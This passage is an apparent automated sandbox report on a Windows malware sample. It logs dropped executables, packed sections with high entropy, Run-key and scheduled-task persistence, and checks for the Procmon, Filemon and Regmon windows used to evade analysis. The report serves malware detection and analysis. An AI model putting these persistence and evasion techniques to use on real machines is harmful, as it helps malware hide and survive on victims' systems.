Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name: opmmjkup
Source: random[1].exe.8.dr Static PE information: section name: dvfrhkft
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 58ce8f976c.exe.8.dr Static PE information: section name:
Source: 58ce8f976c.exe.8.dr Static PE information: section name: .idata
Source: 58ce8f976c.exe.8.dr Static PE information: section name: opmmjkup
Source: 58ce8f976c.exe.8.dr Static PE information: section name: dvfrhkft
Source: 58ce8f976c.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .rsrc
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: xpxnzipx
Source: random[1].exe0.8.dr Static PE information: section name: atgrbfaq
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .rsrc
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .idata
Source: 7451ae0b11.exe.8.dr Static PE information: section name:
Source: 7451ae0b11.exe.8.dr Static PE information: section name: xpxnzipx
Source: 7451ae0b11.exe.8.dr Static PE information: section name: atgrbfaq
Source: 7451ae0b11.exe.8.dr Static PE information: section name: .taggant
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name:
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: .idata
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: mljriapp
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: mudtavgt
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: .taggant
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: .idata
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name:
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: jqddeztg
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: hzelrcyv
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: .taggant
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name:
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: .idata
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: mljriapp
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: mudtavgt
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: .taggant
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: .idata
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name:
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: jqddeztg
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: hzelrcyv
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0156D7AA push eax; ret 0_3_0156DA11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_014F457E push ebp; ret 0_3_014F4582
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_014EE0B6 push ebp; ret 0_3_014EE0BA
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05BDEADD push edi; retf 0_3_05BDEAED
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0156D7AA push eax; ret 0_3_0156DA11
Source: C:\Users\user\Desktop\file.exe Code function: 0_3_0156D7AA push eax; ret 0_3_0156DA11
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA984B push 410BC413h; mov dword ptr [esp], esp 3_2_00CA98D2
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA984B push 20FE0D6Fh; mov dword ptr [esp], eax 3_2_00CA9961
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CB9A66 push ebx; mov dword ptr [esp], 6781B220h 3_2_00CB9A7A
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1EBE0 push ecx; mov dword ptr [esp], 2424DFB7h 3_2_00B1F762
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1ED80 push 1B57FC02h; mov dword ptr [esp], ebx 3_2_00B1F596
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1ED80 push edi; mov dword ptr [esp], 70FD6605h 3_2_00B1F707
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA96DD push edi; mov dword ptr [esp], 7DFF2820h 3_2_00CA9726
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push edx; mov dword ptr [esp], 3FE71456h 3_2_00B1E8B3
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push 07F53464h; mov dword ptr [esp], ebp 3_2_00B1F0C0
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push ebp; mov dword ptr [esp], 3EFA729Ch 3_2_00B1F66D
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1E8B1 push ecx; mov dword ptr [esp], 5E3A99C4h 3_2_00B1F67C
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAA0C3 push ebp; mov dword ptr [esp], 487F2E14h 3_2_00CAA0D3
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAA0C3 push esi; mov dword ptr [esp], 25FEEA00h 3_2_00CAA16A
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAD0C5 push ebp; ret 3_2_00CAD0D4
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CA60DE push eax; mov dword ptr [esp], 6DFF94B5h 3_2_00CA6615
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B218AE push ebp; mov dword ptr [esp], esi 3_2_00B24FC8
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CB90E7 push edx; mov dword ptr [esp], 7FE655CDh 3_2_00CB90FF
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B2288A push 0B53B314h; mov dword ptr [esp], edi 3_2_00B2289D
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B2288A push edi; mov dword ptr [esp], 2ABEF28Eh 3_2_00B231AB
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBF0F2 push eax; ret 3_2_00CBF101
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B210F8 push eax; mov dword ptr [esp], edx 3_2_00B239C2
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBD085 push eax; mov dword ptr [esp], ecx 3_2_00CBD087
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CBD085 push 3E8D4586h; mov dword ptr [esp], ebp 3_2_00CBD0FB
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1C0E3 push esi; mov dword ptr [esp], 57AA8FD8h 3_2_00B1C997
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B210E6 push 1E868B81h; mov dword ptr [esp], ebp 3_2_00B24E72
Source: file.exe Static PE information: section name: entropy: 7.965337240899708
Source: 7YW0363WEKP7ULOI0QRA.exe.0.dr Static PE information: section name: entropy: 7.711704641489236
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: entropy: 7.9781027784871075
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.0.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.9781027784871075
Source: skotes.exe.4.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.965337240899708
Source: 58ce8f976c.exe.8.dr Static PE information: section name: entropy: 7.965337240899708
Source: random[1].exe0.8.dr Static PE information: section name: xpxnzipx entropy: 7.952407047426657
Source: 7451ae0b11.exe.8.dr Static PE information: section name: xpxnzipx entropy: 7.952407047426657
Source: W7N881PI98FKFOKWDI7HCS7W.exe.10.dr Static PE information: section name: entropy: 7.711704641489236
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: entropy: 7.9781027784871075
Source: DP4Z2JGIRNCYT3CKHONMY.exe.10.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: 8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe.12.dr Static PE information: section name: entropy: 7.711704641489236
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: entropy: 7.9781027784871075
Source: ZVNI3QDRJUMHB5ZEQG5Z2C.exe.12.dr Static PE information: section name: jqddeztg entropy: 7.952904890450544
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File created: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1002538001\num.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7451ae0b11.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 760934cb92.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 58ce8f976c.exe
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe File created: C:\Windows\Tasks\skotes.job
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 58ce8f976c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 58ce8f976c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7451ae0b11.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7451ae0b11.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 760934cb92.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 760934cb92.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run num.exe
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\file.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX
